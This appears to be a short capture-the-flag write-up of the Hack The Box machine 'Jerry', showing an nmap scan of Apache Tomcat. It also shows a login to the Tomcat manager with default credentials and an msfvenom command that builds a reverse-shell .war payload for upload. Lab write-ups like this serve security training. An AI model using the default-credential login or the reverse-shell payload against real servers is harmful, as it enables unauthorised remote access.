✒️
Report
  • Introduction
  • MCC 2022
    • ThisIsSoEasy1
    • Hermoso
  • Vulnhub
    • Kioptrix
      • Level 1.1
      • Level 1.2
      • Level 1.3
      • Level 1.4
    • Symfonos
      • Symfonos 1
      • Symfonos 2
      • Symfonos 3
      • Symfonos 4
    • DC
      • DC6
      • DC9
    • Sar1
    • Toppo 1
    • Prime 1
    • Bob 1.0.1
    • Escalate Linux < NOT FINISH >
    • Djinn 1
    • Golden Eye 1
    • Hackme1
    • Stapler 1
    • DerpNStink
    • Lin Security
    • W34KN3SS
  • Symfonos 5 <NOT WORKING>
  • Hackthebox
    • Delivery (Easy)
    • Spectra (Easy)
    • Script Kiddie (Easy)
    • Armageddon (Easy)
    • Love (Easy)
    • Knife (Easy)
    • Traverxec (Easy)
    • Bastion (Easy)
    • Heist (Easy)
    • Shocker (Easy)
    • Active (Easy)
    • The Notebook (Medium)
    • Paper (Easy)
    • Jerry (Easy)
    • Networked (Easy)
    • Swagshop (Easy) - Not Working
    • Lame (Easy)
Powered by GitBook
On this page
  • Enumeration
  • Nmap

Was this helpful?

  1. Hackthebox

Jerry (Easy)

PreviousPaper (Easy)NextNetworked (Easy)

Last updated 3 years ago

Was this helpful?

Enumeration

Nmap

# Nmap 7.92 scan initiated Tue Jun  7 11:38:57 2022 as: nmap -sC -sV -oA nmap/Jerry -Pn 10.129.88.89
Nmap scan report for 10.129.88.89
Host is up (0.33s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun  7 11:40:24 2022 -- 1 IP address (1 host up) scanned in 87.02 seconds

Navigate to port 8080

Navigate to /manager

Login with default credentials tomcat:s3cret

We can use msfvenom to generate a java .war file reverse shell and upload it to the Tomcat.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f war > test.war 

New application inserted!

We can navigate to the Administrator's Desktop to get the flag

Congratz!